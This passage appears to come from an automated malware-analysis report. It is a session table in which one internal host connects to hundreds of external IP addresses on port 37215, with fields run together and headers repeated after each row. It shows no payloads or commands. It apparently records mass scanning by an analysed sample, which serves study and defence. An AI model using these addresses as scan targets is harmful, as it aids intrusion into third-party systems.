                                              9004192.168.2.154851831.174.204.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9005192.168.2.1559714156.231.221.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9006192.168.2.1540738157.74.223.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9007192.168.2.1534660222.42.31.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9008192.168.2.154711641.176.60.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9009192.168.2.155955094.42.36.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9010192.168.2.1540712121.36.78.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9011192.168.2.1559328156.209.155.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9012192.168.2.155996294.77.90.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9013192.168.2.1557990121.109.76.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9014192.168.2.1557188186.90.243.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9015192.168.2.1560366121.152.62.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9016192.168.2.154497237.95.213.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9017192.168.2.155710237.136.20.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9018192.168.2.1540914122.240.144.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9019192.168.2.1547176121.86.219.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9020192.168.2.1544082156.236.189.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9021192.168.2.154629079.189.80.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9022192.168.2.1547450197.17.67.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9023192.168.2.155860245.162.134.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9024192.168.2.1550154102.156.102.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9025192.168.2.1558508138.184.203.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9026192.168.2.1549956197.228.81.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9027192.168.2.154515241.113.93.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9028192.168.2.154227445.227.149.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9029192.168.2.1541702197.255.102.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9030192.168.2.1542262190.31.170.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9031192.168.2.1546016197.166.136.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9032192.168.2.1537222156.126.127.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9033192.168.2.1559788102.56.207.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9034192.168.2.154631637.239.47.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9035192.168.2.1546844156.119.50.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9036192.168.2.1538406102.245.164.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9037192.168.2.1534738222.72.151.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9038192.168.2.1539354186.97.98.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9039192.168.2.1559440156.54.136.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9040192.168.2.1547848181.188.240.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9041192.168.2.1554578156.102.85.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9042192.168.2.1547016157.89.192.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9043192.168.2.1545688156.91.146.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9044192.168.2.1542230186.191.234.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9045192.168.2.1536500197.206.45.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9046192.168.2.155609445.57.119.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9047192.168.2.154357437.195.135.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9048192.168.2.1536578197.8.40.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9049192.168.2.1538236197.229.240.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9050192.168.2.1540550102.196.210.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9051192.168.2.1548700122.46.11.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9052192.168.2.155000431.61.29.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9053192.168.2.1537808120.160.168.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9054192.168.2.155223241.253.226.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9055192.168.2.1556622190.98.92.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9056192.168.2.1540070121.143.220.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9057192.168.2.1533222156.114.105.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9058192.168.2.154097437.219.18.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9059192.168.2.1560062181.24.100.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9060192.168.2.1549658190.121.102.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9061192.168.2.1535986190.76.15.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9062192.168.2.1552800186.46.197.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9063192.168.2.155510437.147.226.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9064192.168.2.1545266157.143.154.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9065192.168.2.1559946222.109.66.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9066192.168.2.155219045.9.5.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9067192.168.2.1555410138.100.54.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9068192.168.2.1539092156.154.169.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9069192.168.2.1558924156.80.93.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9070192.168.2.1559560157.39.150.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9071192.168.2.1556672156.151.135.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9072192.168.2.1537030186.82.122.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9073192.168.2.156088645.126.21.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9074192.168.2.1544698156.29.61.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9075192.168.2.1534058138.19.144.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9076192.168.2.154921241.167.18.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9077192.168.2.153979494.103.204.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9078192.168.2.1559358102.147.140.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9079192.168.2.1547720181.12.216.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9080192.168.2.155461041.149.138.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9081192.168.2.154437494.233.126.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9082192.168.2.1537152222.189.18.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9083192.168.2.1533112222.67.202.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9084192.168.2.1549360102.209.144.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9085192.168.2.154348694.241.59.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9086192.168.2.1547746197.122.142.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9087192.168.2.1536370122.57.120.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9088192.168.2.1543882222.86.152.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9089192.168.2.153765294.97.6.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9090192.168.2.1546668186.104.232.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9091192.168.2.155550641.75.22.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9092192.168.2.1552456197.8.252.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9093192.168.2.154945845.180.177.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9094192.168.2.154497641.18.5.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9095192.168.2.154350031.207.118.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9096192.168.2.1559248197.98.224.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9097192.168.2.1533800157.250.184.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9098192.168.2.1543458102.147.217.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9099192.168.2.1547458197.175.133.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9100192.168.2.156097445.16.242.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9101192.168.2.1558354190.138.223.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9102192.168.2.1557798122.253.233.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9103192.168.2.1535406186.40.155.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9104192.168.2.155805294.136.129.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9105192.168.2.1536102186.199.14.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9106192.168.2.1551660197.53.123.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9107192.168.2.1539950157.35.242.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9108192.168.2.154529837.196.75.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9109192.168.2.1557066157.84.246.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9110192.168.2.1533814181.100.179.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9111192.168.2.1546128121.221.189.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9112192.168.2.1542288197.81.121.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9113192.168.2.155576845.240.76.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9114192.168.2.1534680156.194.253.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9115192.168.2.154983237.143.249.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9116192.168.2.155884631.49.182.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9117192.168.2.153630841.20.70.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9118192.168.2.1547518121.247.208.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9119192.168.2.155337045.181.109.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9120192.168.2.1553306157.57.47.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9121192.168.2.1559794186.182.213.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9122192.168.2.155404841.226.178.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9123192.168.2.1553990121.43.30.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9124192.168.2.153574037.32.252.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9125192.168.2.156066631.66.188.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9126192.168.2.1551110190.209.1.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9127192.168.2.1543584157.28.170.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9128192.168.2.154156641.238.127.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9129192.168.2.1535832186.78.232.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9130192.168.2.1551488156.124.141.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9131192.168.2.1535208102.57.107.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9132192.168.2.1542836102.135.73.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9133192.168.2.1533532122.128.204.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9134192.168.2.155046631.113.189.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9135192.168.2.1534308156.65.26.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9136192.168.2.154893237.4.37.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9137192.168.2.1555584197.18.213.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9138192.168.2.1558958197.130.225.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9139192.168.2.1551056121.193.134.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9140192.168.2.1557434186.146.174.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9141192.168.2.153677431.163.1.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9142192.168.2.1538288157.153.196.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9143192.168.2.1551606121.154.111.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9144192.168.2.1536474222.251.208.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9145192.168.2.1550600181.120.143.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9146192.168.2.1545280102.136.197.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9147192.168.2.1545496181.73.182.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9148192.168.2.1552792157.189.200.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9149192.168.2.1546708121.19.41.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9150192.168.2.1558074102.209.8.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9151192.168.2.1538362138.204.137.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9152192.168.2.1558596138.227.235.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9153192.168.2.1547362222.180.198.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9154192.168.2.1545048186.221.61.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9155192.168.2.1545160138.212.56.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9156192.168.2.1533110102.231.73.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9157192.168.2.154842437.226.250.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9158192.168.2.1550958122.16.94.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9159192.168.2.1540544197.174.42.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9160192.168.2.1542964121.29.75.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9161192.168.2.1559962102.135.163.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9162192.168.2.155156845.23.110.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9163192.168.2.1551582121.186.240.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9164192.168.2.1540686181.205.9.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9165192.168.2.1541730165.231.48.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9166192.168.2.155765031.142.24.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9167192.168.2.154825031.17.242.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9168192.168.2.1551282190.249.229.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9169192.168.2.1541874197.249.78.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9170192.168.2.154595237.21.62.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9171192.168.2.153339431.214.139.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9172192.168.2.1534272222.108.35.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9173192.168.2.1543832197.149.200.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9174192.168.2.155190431.61.237.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9175192.168.2.156021841.119.7.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9176192.168.2.1554268138.189.141.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9177192.168.2.1541768181.224.212.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9178192.168.2.1547872190.31.228.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9179192.168.2.1548518197.79.78.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9180192.168.2.155049845.100.250.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9181192.168.2.1539440211.226.230.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9182192.168.2.1553668122.219.59.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9183192.168.2.154392231.165.188.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9184192.168.2.1542982122.105.24.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9185192.168.2.1553436222.171.26.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9186192.168.2.1536482222.64.103.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9187192.168.2.155665445.17.40.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9188192.168.2.1534478171.255.160.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9189192.168.2.1536936222.0.73.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9190192.168.2.154718494.239.218.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9191192.168.2.153519231.146.10.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9192192.168.2.1556962121.21.18.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9193192.168.2.1557564138.164.233.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9194192.168.2.1534090190.37.10.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9195192.168.2.1541012121.60.99.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9196192.168.2.1543072138.38.112.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9197192.168.2.1536404122.231.119.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9198192.168.2.154699494.132.77.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9199192.168.2.1547542181.56.74.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9200192.168.2.155079641.13.56.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9201192.168.2.154928031.218.245.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9202192.168.2.1536406181.202.220.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9203192.168.2.1549054174.230.184.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9204192.168.2.1545054138.160.29.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9205192.168.2.1550542222.183.0.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9206192.168.2.153654241.216.66.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9207192.168.2.1544874190.142.40.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9208192.168.2.1558104122.22.46.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9209192.168.2.1560480186.61.29.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9210192.168.2.1545202156.73.35.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9211192.168.2.1542418222.191.187.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9212192.168.2.1537312183.17.35.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9213192.168.2.1553598157.30.141.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9214192.168.2.1559796190.56.109.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9215192.168.2.1555184181.150.129.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9216192.168.2.1559470138.56.118.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9217192.168.2.154793694.218.152.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9218192.168.2.154378641.42.86.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9219192.168.2.1549770122.78.95.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9220192.168.2.1558696181.35.201.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9221192.168.2.1549872121.35.77.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9222192.168.2.153730694.59.194.4237215
